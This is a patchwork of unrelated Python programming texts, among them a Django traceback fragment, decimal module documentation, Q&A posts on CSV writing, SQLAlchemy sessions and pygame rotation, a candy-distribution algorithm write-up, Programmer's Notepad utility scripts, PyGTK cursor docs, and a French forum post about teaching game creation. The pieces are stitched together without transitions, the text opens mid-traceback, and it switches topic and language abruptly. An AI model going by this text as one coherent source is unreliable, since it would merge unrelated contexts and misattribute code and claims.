*args, **kwargs) 499 clone.query.add_q(~Q(*args, **kwargs)) 500 else: --> 501 clone.query.add_q(Q(*args, **kwargs)) 502 return clone 503 /usr/lib/python2.5/django/db/models/sql/query.py in add_q(self, q_object, used_aliases) /usr/lib/python2.5/django/db/models/sql/query.py in add_filter(self, filter_expr, connector, negate, trim, can_reuse, process_extras) /usr/lib/python2.5/django/db/models/sql/query.py in get_meta(self) <type 'exceptions.AttributeError'>: 'NoneType' object has no attribute '_meta' Update: By the way, I just wanted to mention that when I copy the logic inside my _filter_or_exclude method into the actual QuerySet class, it works flawlessly.
Module decimal This is a Py2.3 implementation of decimal floating point arithmetic based on the General Decimal Arithmetic Specification: www2.hursley.ibm.com/decimal/decarith.html and IEEE standard 854-1987: www.cs.berkeley.edu/~ejr/projects/754/private/drafts/854-1987/dir.html Decimal floating point has finite precision with arbitrarily large bounds. The purpose of the module is to support arithmetic using familiar "schoolhouse" rules and to avoid the some of tricky representation issues associated with binary floating point. The package is especially useful for financial applications or for contexts where users have expectations that are at odds with binary floating point (for instance, in binary floating point, 1.00 % 0.1 gives 0.09999999999999995 instead of the expected Decimal("0.00") returned by decimal floating point). Here are some examples of using the decimal module: >>> from decimal import * >>> setcontext(ExtendedContext) >>> Decimal(0) Decimal("0") >>> Decimal("1") Decimal("1") >>> Decimal("-.0123") Decimal("-0.0123") >>> Decimal(123456) Decimal("123456") >>> Decimal("123.45e12345678901234567890") Decimal("1.2345E+12345678901234567892") >>> Decimal("1.33") + Decimal("1.27") Decimal("2.60") >>> Decimal("12.34") + Decimal("3.87") - Decimal("18.41") Decimal("-2.20") >>> dig = Decimal(1) >>> print dig / Decimal(3) 0.333333333 >>> getcontext().prec = 18 >>> print dig / Decimal(3) 0.333333333333333333 >>> print dig.sqrt() 1 >>> print Decimal(3).sqrt() 1.73205080756887729 >>> print Decimal(3) ** 123 4.85192780976896427E+58 >>> inf = Decimal(1) / Decimal(0) >>> print inf Infinity >>> neginf = Decimal(-1) / Decimal(0) >>> print neginf -Infinity >>> print neginf + inf NaN >>> print neginf * inf -Infinity >>> print dig / 0 Infinity >>> getcontext().traps[DivisionByZero] = 1 >>> print dig / 0 Traceback (most recent call last): ... ... ... DivisionByZero: x / 0 >>> c = Context() >>> c.traps[InvalidOperation] = 0 >>> print c.flags[InvalidOperation] 0 >>> c.divide(Decimal(0), Decimal(0)) Decimal("NaN") >>> c.traps[InvalidOperation] = 1 >>> print c.flags[InvalidOperation] 1 >>> c.flags[InvalidOperation] = 0 >>> print c.flags[InvalidOperation] 0 >>> print c.divide(Decimal(0), Decimal(0)) Traceback (most recent call last): ... ... ... InvalidOperation: 0 / 0 >>> print c.flags[InvalidOperation] 1 >>> c.flags[InvalidOperation] = 0 >>> c.traps[InvalidOperation] = 0 >>> print c.divide(Decimal(0), Decimal(0)) NaN >>> print c.flags[InvalidOperation] 1 >>> getcontext(_local=local) Returns this thread's context. setcontext(context, _local=local) Set this thread's context to context. localcontext(ctx=None) Return a context manager for a copy of the supplied context _normalize(op1, op2, shouldround=0, prec=0) Normalizes op1, op2 to have the same exp and length of coefficient. _isinfinity(num) Determines whether a string or float is infinity. _isnan(num) Determines whether a string or float is NaN _parser(...) match(string[, pos[, endpos]]) --> match object or None. ROUND_DOWN = 'ROUND_DOWN' ROUND_HALF_UP = 'ROUND_HALF_UP' ROUND_HALF_EVEN = 'ROUND_HALF_EVEN' ROUND_CEILING = 'ROUND_CEILING' ROUND_FLOOR = 'ROUND_FLOOR' ROUND_UP = 'ROUND_UP' ROUND_HALF_DOWN = 'ROUND_HALF_DOWN' NEVER_ROUND = 'NEVER_ROUND' ALWAYS_ROUND = 'ALWAYS_ROUND' _signals = [<class 'decimal.Clamped'>, <class 'decimal.Divisio... _condition_map = {<class 'decimal.ConversionSyntax'>: <class '... _infinity_map = {'+inf': 1, '+infinity': 1, '-inf': -1, '-infi... DefaultContext = Context(prec=28, rounding=ROUND_HALF_EVEN, Em... BasicContext = Context(prec=9, rounding=ROUND_HALF_UP, Emin=-9... ExtendedContext = Context(prec=9, rounding=ROUND_HALF_EVEN, Em... Inf = Decimal("Infinity") negInf = Decimal("-Infinity") Infsign = (Decimal("Infinity"), Decimal("-Infinity")) NaN = Decimal("NaN") Imports: _copy Returns this thread's context. If this thread does not yet have a context, returns a new context and sets this thread's context. New contexts are copies of DefaultContext. Return a context manager for a copy of the supplied context Uses a copy of the current context if no context is specified The returned context manager creates a local decimal context in a with statement: def sin(x): with localcontext() as ctx: ctx.prec += 2 # Rest of sin calculation algorithm # uses a precision 2 greater than normal return +s # Convert result to normal precision def sin(x): with localcontext(ExtendedContext): # Rest of sin calculation algorithm # uses the Extended Context from the # General Decimal Arithmetic Specification return +s # Convert result to normal context _normalize(op1, op2, shouldround=0, prec=0) Normalizes op1, op2 to have the same exp and length of coefficient. Done during addition. _adjust_coefficients(op1, op2) Adjust op1, op2 so that op2.int * 10 > op1.int >= op2.int. Returns the adjusted op1, op2 as well as the change in op1.exp-op2.exp. Used on _WorkRep instances during division. Convert other to Decimal. Verifies that it's ok to use in an implicit construction. Determines whether a string or float is infinity. +1 for negative infinity; 0 for finite ; +1 for positive infinity Determines whether a string or float is NaN (1, sign, diagnostic info as string) => NaN (2, sign, diagnostic info as string) => sNaN 0 => not a NaN match(string[, pos[, endpos]]) --> match object or None. Matches zero or more characters at the beginning of the string _signals Value: [<class 'decimal.Clamped'>, <class 'decimal.DivisionByZero'>, <class 'decimal.Inexact'>, <class 'decimal.Overflow'>, <class 'decimal.Rounded'>, <class 'decimal.Underflow'>, <class 'decimal.InvalidOperation'>, <class 'decimal.Subnormal'>] _condition_map Value: {<class 'decimal.ConversionSyntax'>: <class 'decimal.InvalidOperation' >, <class 'decimal.DivisionImpossible'>: <class 'decimal.InvalidOperatio n'>, <class 'decimal.DivisionUndefined'>: <class 'decimal.InvalidOperation '>, <class 'decimal.InvalidContext'>: <class 'decimal.InvalidOperation'>} _infinity_map Value: {'+inf': 1, '+infinity': 1, '-inf': -1, '-infinity': -1, 'inf': 1, 'infinity': 1} DefaultContext Value: Context(prec=28, rounding=ROUND_HALF_EVEN, Emin=-999999999, Emax=99999 9999, capitals=1, flags=[], traps=[InvalidOperation, Overflow, Divisio nByZero]) BasicContext Value: Context(prec=9, rounding=ROUND_HALF_UP, Emin=-999999999, Emax=99999999 9, capitals=1, flags=[], traps=[Underflow, InvalidOperation, Overflow, Clamped, DivisionByZero]) ExtendedContext Value: Context(prec=9, rounding=ROUND_HALF_EVEN, Emin=-999999999, Emax=999999 999, capitals=1, flags=[], traps=[])
I'm new to programming, and also to this site, so my apologies in advance for anything silly or "newbish" I may say or ask. I'm currently trying to write a script in python that will take a list of items and write them into a csv file, among other things. Each item in the list is really a list of two strings, if that makes sense. In essence, the format is [[Google, http://google.com], [BBC, http://bbc.co.uk]], but with different values of course. Within the CSV, I want this to show up as the first item of each list in the first column and the second item of each list in the second column. This is the part of my code that I need help with: with open('integration.csv', 'wb') as f: writer = csv.writer(f, delimiter=',', dialect='excel') writer.writerows(w for w in foundInstances) For whatever reason, it seems that the delimiter is being ignored. When I open the file in Excel, each cell has one list. Using the old example, each cell would have "Google, http://google.com". I want Google in the first column and http://google.com in the second. So basically "Google" and "http://google.com", and then below that "BBC" and "http://bbc.co.uk". Is this possible? Within my code, foundInstances is the list in which all the items are contained. As a whole, the script works fine, but I cannot seem to get this last step. I've done a lot of looking around within stackoverflow and the rest of the Internet, but I haven't found anything that has helped me with this last step. Any advice is greatly appreciated. If you need more information, I'd be happy to provide you with it. Thanks!
I hope you got pylons working; for anyone else that may later read question I'll present some pointers in the right direction. First of all, you are only creating a engine and a metadata object. While you can use the engine to create connections directly you would almost always use a Session to manage querying and updating your database. Pylons automatically setups this for you by creating a engine from your configuration file, then passing it to yourproject.model.__init__.py:init_model() which binds it to a scoped_session object. This scoped_session object is available from yourproject.model.meta and is the object you would use to query your database. For example: record = meta.Session.query(model.MyTable).filter(id=42) Because it is a scoped_session it automatically creates a Session object and associates it with the current thread if it doesn't already exists. Scoped_session passes all action (.query(), .add(), .delete()) down into the real Session object and thus allows you a simple way to interact the database with having to manage the non-thread-safe Session object explicitly. The scoped_session, Session, object from yourproject.model.meta is automatically associated with a metadata object created as either yourproject.model.meta:metadata (in pylons 0.9.7 and below) or yourproject.model.meta:Base.metadata (in pylons 1.0). Use this metadata object to define your tables. As you can see in newer versions of pylons a metadata is associated with a declarative_base() object named Base, which allows you to use SqlAlchemy's declarative style. Using this from the controller from yourproject import model from yourproject.model import Session class MyController(..): def resource(self): result = Session.query(model.email_list).\ filter(model.email_list.c.id=42).one() return str(result) Use real connections If you really want to get a connection object simply use from yourproject.model import Session connection = Session.connection() result = connection.execute("select 3+4;") // more connection executions Session.commit() However this is all good, but what you should be doing is... This leaves out that you are not really using SqlAlchemy much. The power of SqlAlchemy really shines when you start mapping your database tables to python classes. So anyone looking into using pylons with a database should take a serious look at what you can do with SqlAlchemy. If SqlAlchemy starts out intimidating simply start out with using its declarative approach, which should be enough for almost all pylons apps. In your model instead of defining Table constructs, do this: from sqlalchemy import Column, Integer, Unicode, ForeignKey from sqlalchemy.orm import relation from yourproject.model.meta import Base class User(Base): __tablename__ = 'users' # primary_key implies nullable=False id = Column(Integer, primary_key=True, index=True) # nullable defaults to True name = Column(Unicode, nullable=False) notes = relation("UserNote", backref="user") query = Session.query_property() class UserNote(Base): __tablename__ = 'usernotess' # primary_key implies nullable=False id = Column(Integer, primary_key=True, index=True) userid = Column(Integer, index=True, ForeignKey("User.id")) # nullable defaults to True text = Column(Unicode, nullable=False) query = Session.query_property() Note the query objects. These are smart object that live on the class and associates your classes with the scoped_session(), Session. This allows you to event more easily extract data from your database. from sqlalchemy.orm import eagerload def resource(self): user = User.query.filter(User.id==42).options(eagerload("notes")).one() return "\n".join([ x.text for x in user.notes ])
To make the analysis of this algorithm more interesting I will the following input: 9 2 3 4 4 4 2 1 3 4 Firstly, notice if a kid sits next to a kid who is getting x candies and that kid has a lower rating then the first kid should get at least x+1 candies. Making the difference more than 1 will just waste candies. The difference sometimes must be greater than 1, but I'll get to when that happens later. Now on to finding the kids who should get only one candy. I visualise the ratings as a mountain range (The greater the rating the higher the mountains at that point) and finding the kids who should get one candy as finding valleys (points where both neighbours have a higher rating or the same rating) in the mountain range. The example given would look like (the valleys are indicated by the arrows): *** * **** ** ****** ** ********* ^ ^ ^ For the purpose of this process I assume there are 2 peaks of "infinite" height before the beginning and after the end of this line. (When I say infinite I just mean larger than any possible value in the input so you can just use 10^5+1 for "infinity". In practice, I'd use a value larger than that in case the problem setters have bugged input data.) You can easily find the valleys using the following code: ratings = ... N = ... valleys = [] def get_rating(i): if i < 0 or i > N-1: return INFINITY return ratings[i] for i from 0 to N-1: if get_rating(i) <= get_rating(i-1) and get_rating(i) <= get_rating(i+1): valleys.append(i) The array valleys contains the indices of the valleys. We know each kid representing a valley should get one candy. For illustration assume the valley is at index 4. Now we know the kids at index 3 and 5 should get at least 2 candies. If the kid at index 2 has a higher rating than the kid at index 3 that kid should get at least 3 candies. And so on for 2 and down. Similarly for 6 and up. Note I say "at least", this is because of peaks (kids whose ratings are higher than both of their neighbour's, note unlike valleys I don't include equality in this definition). Peaks can have two minimum constraints and we simply choose the greater of the two. Now we can find the number of candies each kid should get with the following code: candies = [0] * N # An array of N 0s for valley_idx in valleys: candies[valley_idx] = 1 cur_idx = valley_idx-1 cur_candies = 2 while cur_idx >= 0 and ratings[cur_idx] > ratings[cur_idx+1]: candies[cur_idx] = max(candies[cur_idx], cur_candies) cur_idx -= 1 cur_candies += 1 cur_idx = valley_idx+1 cur_candies = 2 while cur_idx < N and ratings[cur_idx] > ratings[cur_idx-1]: candies[cur_idx] = max(candies[cur_idx], cur_candies) cur_idx += 1 cur_candies += 1 Then the number of candies the teacher needs to buy is the sum of the values in the candies array. Doing this the answer turns out to be 18 for our sample input or in the form of a graph: * * * ** ** ** ********* Solution to slightly altered problem statement In the above solution I assumed that adjacent kids with the same rating don't place any restrictions on the amount of candy either should get with relation to the other. If it is instead the case that both kids need to get the same amount of candy we can quite easily alter the algorithm to take this into account. The basic idea is that we do a sort of run length encoding, because we can notice that whether there are 1 or more kids in a row that have the same rating it doesn't alter the amount of candies their neighbours should get. We need to keep track of the number of kids in a row though since 5 kids in a row getting 5 candies means we have to dole out 25 candies and not just 5. We do this with a multipliers array. Using the following code we find the new ratings array and the multipliers array: new_ratings = [ratings[0]] multipliers = [1] for i from 1 to N-1: if ratings[i] == new_ratings[len(new_ratings)-1]: multipliers[len(new_ratings)-1] += 1 else: new_ratings.append(ratings[i]) multipliers.append(1) Now we just run the original algorithm on the new_ratings array and get a candies array. Then to get the actual amount of candies we can just run: answer = 0 for i from 0 to len(new_ratings)-1: answer += multipliers[i] * candies[i] Doing this the answer turns out to be 20 for our sample input or in the form of a graph: *** * ***** ** *********
I'm trying to do a relatively simple animation that requires rotating an ellipse on a rotating background. I've had to resort to a bit of trickery to get pygame.transform.rotate to play nice with the surfaces I'm trying to rotate. Namely, I've made this function that recenters the new rect obtained from pygame's rotation function: def recenter(orig_rect, rotated_surf): oldcenter = orig_rect.center rotRect = rotated_surf.get_rect() rotRect.center = oldcenter screen.blit(rotated_surf, rotRect) The functionning is fairly self-explanatory. I realize that the original (unrotated) surface remains blitted onto the display, but this turns out not to really be a problem. Don't worry about that. The above function is used by the rotating functions (background & ellipse) as such: # width, height, screen are globals def rotate_background(surf, speed, t0): new_angle = ((pygame.time.get_ticks() - t0) * (speed / 1000)) % 360 w, h = surf.get_size() blittedRect = screen.blit(surf, (width / 2 - w / 2, height / 2 - h / 2)) recenter(blittedRect, pygame.transform.rotate(surf, new_angle)) return surf def rotate_ellipse(surf, coords, speed, t0): new_angle = ((pygame.time.get_ticks() - t0) * (speed / 1000)) % 360 if new_angle > 90: new_angle = 90 # limit rotation w, h = surf.get_size() x, y = coords blittedRect = screen.blit(surf, (width / 2 - w / 2 + x, height / 2 - h / 2 + y)) recenter(blittedRect, pygame.transform.rotate(surf, new_angle)) These rotation functions are called one for each frame. Here's a simplified version of my main game loop. Note that this is not the actual production code, but serves as an illustration of how the above elements (which are taken directly from the code base) tie together: ellipse = create_ellipse() # returns a surf background = create_background() # returns a surf while True: rotate_background() rotate_ellipse() pygame.display.flip() A word about the background and ellipse variables above. Both variables contain a pygame.Surface instance on which things have been drawn. I won't go into details about background since that is working fine. In create_ellipse, an ellipse was drawn onto the ellipse surface by means of pygame.draw.ellipse, in yellow. Prior to that, ellipse.fill(GREEN) was called. The colorkey for ellipse was also set to GREEN to make sure that the entire surface is transparent except where the yellow ellipse was drawn. The Problem: I'm not seeing the ellipse I commented out ellipse.set_colorkey to make sure that the ellipse was properly blitted. It is. I see a green rectagle appear that changes in dimension as the ellipse is rotated. This led me to infer that there is, indeed, an ellipse being drawn since it can be rotated. What gives? I can provide the full code if it can be useful. The whole thing is approximately 200 lines, but I hope my explanation above is enough for you guys. I figured we should start locally and work outwards =) Thanks very much in advance!
Please consider using this website to upload your scripts: It's a bit more organized and allows for easier browsing/uploading/viewing/downloading. If you have any comments/suggestions on that site, please use the feedback link. Eventually the scriptshare website's functionality will be incorporated into pnotepad.org, but for now it exists on a separate domain. If you've already uploaded scripts to this page, consider registering on the scriptshare site and re-uploading your script there. That will allow for things like comments, sorting, etc. This wiki page is now obsolete This page served as a temporary home for user-submitted scripts. If you are adding a new script, please consider using the http://scriptshare.rocketmonkeys.com/ site instead. This page is now obsolete. * Please do not modify someone else's script. If you modify someone else's script, repost it under your name or send your changes to the original author so they can update it. Otherwise it's chaos... chaos! Please follow this template: ### [author's username] - [script title] [description] [script contents] This is modified from the SortLines() script by Scott (wischeese). It sorts lines and removes any duplicates. Case sensitive. @script("Sort Lines (No Duplicates)", "Text") def SortLinesNoDuplicates(): """ Sort Lines, Remove Duplicates (Modified by jumpfroggy from wischeese's "SortLines" script) """ editor = scintilla.Scintilla(pn.CurrentDoc()) editor.BeginUndoAction() lsSelection = editor.GetTextRange(editor.SelectionStart, editor.SelectionEnd) laLines = lsSelection.splitlines(0) laLines.sort() # Filter out duplicate lines laLines2 = [] for line in laLines: if line not in laLines2: laLines2.append(line) lsReplace = string.join(laLines2, '\r\n' ) editor.ReplaceSel(lsReplace) editor.EndUndoAction() ClipStack is a Programmer's Notepad clipboard stack. It allows the user to select text and copy the text, which gets pushed onto a stack. Later this text can be pasted, which then pops the text off of this stack. So, for example, if the user copies item A, then item B, and then item C, all using ClipStack; then they could then paste these items back in the order: Item C, Item B, Item A. ClipStack does copy the the text into the clipboard so that you can paste the current selection in another application, but this will not pop an item off of the stack. When pasting using ClipStack the current contents of the clipboard are replaced with the item on the top of the stack. This means that anything currently in the clipboard will be lost. What ClipStack does not do is push the current clipboard onto the stack. ClipStack could be improved by the addition of a clipboard aware python module that would allow the current clipboard to be used as the top item of the stack. This would allow the snippet to better interact with other applications. ############################################################################### ## ClipStack.py -- A clipboard stack allowing you to copy items into a stack ## and then paste them back in a FILO way. So the first item copied to the stack ## is the last item pasted from it. ## Copy item #1, Copy item #2, Copy item #3 ## Paste #3, #2, #1 ## ## The last item copied is placed onto the regular OS clipboard ## The last item pasted is ALSO placed into the regular OS clipboard ## So take care not to confuse this with the regular OS clipboard and ## The standard Copy/Paste operations. ## By: NickDMax import pn import scintilla from pypn.decorators import script class PNClipStack: """ Maintains a stack of text to paste """ def __init__(self): """ initialize inner data: stack -- the internal list used to store clipboard items """ self.stack = [] def push(self, text): self.stack.append(text) def pop(self): retValue = '' if len(self.stack) > 0: retValue = self.stack.pop() return retValue def clear(self): self.stack = [] def getSize(self): return len(self.stack) ClipStack = PNClipStack() @script('Stack Count', 'ClipStack') def clstkCount(): """ Prints out the size of the current ClipStack """ pn.AddOutput('ClipStack Size: ' + str(ClipStack.getSize()) + '\n') @script('Copy', 'ClipStack') def clstkCopy(): """ Adds the current selection to the ClipStack """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash our script editor = scintilla.Scintilla(doc) start = editor.SelectionStart end = editor.SelectionEnd if (start == end): #nothing is selected lets try to grab the current word. start = editor.WordStartPosition(start, True) end = editor.WordEndPosition(end, True) text = None if (start != end): text = editor.GetTextRange(start, end) if text is not None: ClipStack.push(text) editor.CopyText(len(text), text) #clstkCount() @script('Cut', 'ClipStack') def clstkCut(): """ Adds the current selection to the ClipStack -- cuts it from document""" doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash our script editor = scintilla.Scintilla(doc) start = editor.SelectionStart end = editor.SelectionEnd if (start == end): #nothing is selected lets try to grab the current word. start = editor.WordStartPosition(start, True) end = editor.WordEndPosition(end, True) text = None if (start != end): text = editor.GetTextRange(start, end) if text is not None: ClipStack.push(text) editor.SetSel(start, end) editor.Cut() #clstkCount() @script('Paste', 'ClipStack') def clstkPaste(): """ Pastes the top item from the ClipStack into the document """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash our script editor = scintilla.Scintilla(doc) text = ClipStack.pop() editor.CopyText(len(text), text) editor.Paste() #clstkCount() @script('Clear', 'ClipStack') def clstkCear(): """ Clears the current ClipStack """ ClipStack.clear() #clstkCount() Use this script to encode/decode selections using base64. This can be very useful for embedding Base64 images into HTML. Simply open a small gif/png in PN, select all, and then Base64Encode. This creates a Base64 Version of your image in a new document. Prefix the encoding with ''data:image/gif;base64,'' and you have a Base64 version of your image that you can paste directly into and HTML IMG tag's source. ############################################################################### ## base64Utils.py -- PnPy utility script to encode and decode base64. ## tested on Python 2.6.1. This utility will take the current selection ## (or document if there is no selection) and create a base 64 encoded document ## It will also take a base 64 encoded document and return the unencoded text. ## -- Note: No verification is done to ensure that the unencoded data is ## ASCII or valid unicode textual data. ## By: NickDMax import pn import scintilla from pypn.decorators import script import base64 @script("Base64Encode", "DocUtils") def doBase64(): """ This method will grab the curent selection/document and create a new document that is a base64 vesion of the text """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash pn too often... editor = scintilla.Scintilla(doc) start = editor.SelectionStart end = editor.SelectionEnd if (start == end): #nothing is selected so we will just grab it all... start = 0 end = editor.Length text = editor.GetTextRange(start, end) newDoc = pn.NewDocument(None) newEditor = scintilla.Scintilla(newDoc) newEditor.BeginUndoAction() encoded = base64.b64encode(text) l = len (encoded) m = 0 while l > 80: str = encoded[m:m+80] + '\n' newEditor.AppendText(len(str), str) l, m = l - 80, m + 80 str = encoded[m:m+l] newEditor.AppendText(len(str), str) newEditor.EndUndoAction() @script("DecodeBase64", "DocUtils") def undoBase64(): """ This method will grab the curent selection/document and create a new document that is the base64 decoded vesion of the text """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash pn too often... editor = scintilla.Scintilla(doc) start = editor.SelectionStart end = editor.SelectionEnd if (start == end): #nothing is selected so we will just grab it all... start = 0 end = editor.Length text = editor.GetTextRange(start, end) decoded = base64.b64decode(text) newDoc = pn.NewDocument(None) newEditor = scintilla.Scintilla(newDoc) newEditor.BeginUndoAction() newEditor.AppendText(len(decoded), decoded) newEditor.EndUndoAction() Functions to extract the current selection as a new document, or paste the contents of the clipboard as a new document. ############################################################################### ## AsNewUtils scripts -- the purpose of this script is to provide functions for ## extracting /pasting text as new documents. ## By: NickDMax import pn import scintilla from pypn.decorators import script @script("Extract As New", "DocUtils") def dupDocument(): """ This script will extract the current selection to a new document. """ """ if there is no selection then it will duplicate the entire document. """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash pn too often... editor = scintilla.Scintilla(doc) start = editor.SelectionStart end = editor.SelectionEnd sch = doc.CurrentScheme if (start == end): #nothing is selected so we will just grab it all... start = 0 end = editor.Length text = editor.GetTextRange(start, end) newDoc = pn.NewDocument(sch) newEditor = scintilla.Scintilla(newDoc) newEditor.BeginUndoAction() newEditor.AppendText(len(text), text) newEditor.EndUndoAction() @script("Paste As New", "DocUtils") def pasteAsNew(): """ This script will paste the current contense of the clipboard into a new document """ newDoc = pn.NewDocument(None) newEditor = scintilla.Scintilla(newDoc) newEditor.BeginUndoAction() newEditor.Paste() newEditor.EndUndoAction() Extracts the current selection as a hex dump in a new document. ############################################################################### ## Doc2Hex v0.1 -- Will extract the current selection into a new document ## Formatting the text as a Hex Dump. ## By: NickDMax import pn import scintilla from pypn.decorators import script def HexEncode(text): output = "" if text is not None: lineLength = 0 position = 0 while len(text) > 0: output += "%08X |" % position if len(text) <= 16: lineLength = len(text) else: lineLength = 16 snippet = text[0: lineLength] for x in snippet: output += " %02X" % ord(x) output += "\n" position += 16; text = text[lineLength:] return output @script("Doc2Hex", "DocUtils") def Doc2Hex(): """ Doc2Hex will convert the current document into a HexDump """ doc = pn.CurrentDoc() if doc is not None: #Lets try not to crash pn too often... editor = scintilla.Scintilla(pn.CurrentDoc()) start = editor.SelectionStart end = editor.SelectionEnd if (start == end): #nothing is selected so we will just grab it all... start = 0 end = editor.Length text = editor.GetTextRange(start, end) newDoc = pn.NewDocument(None) newEditor = scintilla.Scintilla(newDoc) newEditor.BeginUndoAction() encoded = HexEncode(text) newEditor.AppendText(len(encoded), encoded) newEditor.EndUndoAction() This script converts the number you have selected into Decimal, Hexadecimal, Octal and Binary and shows the results in the output window. import pn, scintilla def hex2dec(s): """return the integer value of a hexadecimal string s""" return int(s, 16) def Denary2Binary(n): """convert denary integer n to binary string bStr""" bStr = '' if n < 0: raise ValueError, "must be a positive integer" if n == 0: return '0' while n > 0: bStr = str(n % 2) + bStr n = n >> 1 return bStr @script("ConvertNumber") def ConvertNumber(): s = scintilla.Scintilla(pn.CurrentDoc()) if s.SelectionEnd - s.SelectionStart < 1: return sel = s.SelText if sel.find('0x') != -1: sel = sel.replace("0x", "") sel = hex2dec(sel) else: sel = int(sel) pn.AddOutput("Dec: %d\n" % sel) pn.AddOutput("Hex: 0x%X\n" % sel) pn.AddOutput("Oct: %o\n" % sel) pn.AddOutput("Bin: %s" % Denary2Binary(sel)) This script beautify the xml content in current active tab. ```python import pn import scintilla import re, string from pypn.decorators import script @script("Beautify", "Xml") def Beautify(): editor = scintilla.Scintilla(pn.CurrentDoc()) data = editor.GetText(editor.Length) fields = re.split('(<.*?>)',data) content = '' level = 0 for f in fields: if string.strip(f)=='': continue if f[0]=='<' and f[1] != '/' and f[-2] != '/': content += ' '*(level*4) + f + '\n' level = level + 1 elif f[0] == '<' and f[1] != '/' and f[-2] == '/': content += ' '*(level*4) + f + '\n' elif f[:2]=='</': level = level - 1 content += ' '*(level*4) + f + '\n' else: content += ' '*(level*4) + f + '\n' editor.BeginUndoAction() editor.ClearAll() editor.AddText(len(content), content) editor.EndUndoAction()
gtk.gdk.Cursor — standard and pixmap cursors class gtk.gdk.Cursor(gobject.GBoxed): gtk.gdk.Cursor(cursor_type) gtk.gdk.Cursor(display, cursor_type) gtk.gdk.Cursor(display, pixbuf, x, y) gtk.gdk.Cursor(source, mask, fg, bg, x, y) def get_display() A gtk.gdk.Cursorrepresents a bitmap image used for the mouse pointer. Each gtk.gdk.Window canhave its own cursor. By default a gtk.gdk.Window usesits parent's cursor. A standard set of cursors is provided inPyGTK: gtk.gdk.Cursor(cursor_type) the standard cursor to create a new gtk.gdk.Cursor Creates the new gtk.gdk.Cursor froma builtin cursor specified by cursor_type. To makethe cursor invisible, see the description of the gtk.gdk.Cursor() constructor thatcreates a cursor from a pixmap below. gtk.gdk.Cursor(display, cursor_type) the gtk.gdk.Display to create the cursor for the standard cursor to create a new gtk.gdk.Cursor This constructor is available in PyGTK 2.4 and above. Creates the new gtk.gdk.Cursor forthe gtk.gdk.Displayspecified by display from a builtin cursor specifiedby cursor_type gtk.gdk.Cursor(display, pixbuf, x, y) the gtk.gdk.Display to create the cursor for the gtk.gdk.Pixbufholding the cursor image the "hot spot" x offset the "hot spot" y offset a new gtk.gdk.Cursor This constructor is available in PyGTK 2.4 and above. Creates a new gtk.gdk.Cursor forthe gtk.gdk.Displayspecified by display using the gtk.gdk.Pixbufspecified by source as the icon image. The "hotspot"of the cursor will be located as the position specified by xy gtk.gdk.Cursor(source, mask, fg, bg, x, y) the gtk.gdk.Pixmapholding the cursor image the gtk.gdk.Pixmap touse as a mask the unallocated foreground gtk.gdk.Color the unallocated background gtk.gdk.Color the "hot spot" x offset the "hot spot" y offset a new gtk.gdk.Cursor Creates a new gtk.gdk.Cursorusing: gtk.gdk.Pixmapspecified by sourcegtk.gdk.Pixmapspecified by masksourcegtk.gdk.Colorspecified by fggtk.gdk.Colorspecified by bgxy To make the cursor invisible, create a cursor from an emptygtk.gdk.Pixmapas follows: pixmap = gtk.gdk.Pixmap(None, 1, 1, 1) color = gtk.gdk.Color() cursor = gtk.gdk.Cursor(pixmap, pixmap, color, color, 0, 0) def get_display() the associated gtk.gdk.Display This method is available in PyGTK 2.2 and above. The get_display() method returns thegtk.gdk.Display onwhich the cursor is defined.
When you have a well-written library, which is sometimes case in python, you ought just import it and use it as it. Well-written library tends to take life and language of its own, resulting in pleasant-to-read -code, where you rarely reference the library. When a library is well-written, you ought not need renaming or anything else too often. import gat node = gat.Node() child = node.children() Sometimes it's not possible to write it this way, or then you want to lift down things from library you imported. from gat import Node, SubNode node = Node() child = SubNode(node) Sometimes you do this for lot of things, if your import string overflows 80 columns, It's good idea to do this: from gat import ( Node, SubNode, TopNode, SuperNode, CoolNode, PowerNode, UpNode ) The best strategy is to keep all of these imports on the top of the file. Preferrably ordered alphabetically, import -statements first, then from import -statements. Now I tell you why this is the best convention. Python could perfectly have had an automatic import, which'd look from the main imports for the value when it can't be found from global namespace. But this is not a good idea. I explain shortly why. Aside it being more complicated to implement than simple import, programmers wouldn't be so much thinking about the depedencies and finding out from where you imported things ought be done some other way than just looking into imports. Need to find out depedencies is one reason why people hate "from ... import *". Some bad examples where you need to do this exist though, for example opengl -wrappings. So the import definitions are actually valuable as defining the depedencies of the program. It is the way how you should exploit them. From them you can quickly just check where some weird function is imported from.
doudoulolita Faire une animation sur la création de jeux vidéo libres Dans le topic Création de jeu vidéo libre - Appel à candidatures, j'ai découvert le créateur de jeu de Ultimate Smash Friends, Tshirtman. Voici ce que je lui ai écrit: Je cherche un jeu que notre Espace Public Numérique pourrait proposer aux jeunes sur Linux, voire les inciter à participer au projet de développement. smile Mais j'ai du mal à installer Ultimate smash friends chez moi sur Ubuntu Studio Jaunty... mad Le lien du paquet en .deb sur http://usf.tuxfamily.org/wiki/Download#Requirements ne fonctionne pas. J'ai finalement trouvé le paquet en .deb sur cette page en suivant le lien indiqué au bas de la précédente (ouf !). Mais à l'install avec Gdebi, il m'indique qu'il manque python-support. Pourtant, j'ai vérifié que j'avais python (version 2.6, faut-il la version 2.3 ?) et j'ai installé python-pygame juste avant. python-support est bien installé (j'ai vérifié dans synaptic), alors ? C'est le genre de problème qui n'incitera pas les jeunes à se mettre sous Linux, ça, le moindre effort leur est insupportable, les pauvres chéris... cool La page d'Ultimate-smash-friends destinée aux développeurs fait un peu peur ! Je dois avouer que moi qui aime dessiner (en utilisant Gimp, Inkscape mais je tate aussi de la 3D avec Blender), j'aimerais participer à titre individuel, mais je n'y comprends goutte ! La discussion s'est poursuivie sur Ultimate Smash Friends: un smash bros like en python Comme le sujet semblait intéresser plusieurs personnes, je propose de continuer la conversation sur la façon de mener cette animation ici. Voici où m'avait menée ma réflexion: Animation: programmation Trouver une animation permettant d'aborder les notions de base de la programmation, outre ses composantes graphiques, me paraît intéressant, à terme. cool En tout cas, l'idée reste de travailler sous Linux et en logiciel libre. Donc XNA, on oublie, désolée LittleWhite. wink L'idée d'un saut pourraît être sympa si ce n'est pas trop complexe, mais on pourrait imaginer des animations progressives et variables suivant l'âge, le niveau et le degré de motivation des jeunes. On a seulement 2 gamins qui pourraient comprendre et apprécier l'aspect mathématique de la programmation , tandis que les autres risquent d'être vite découragés. 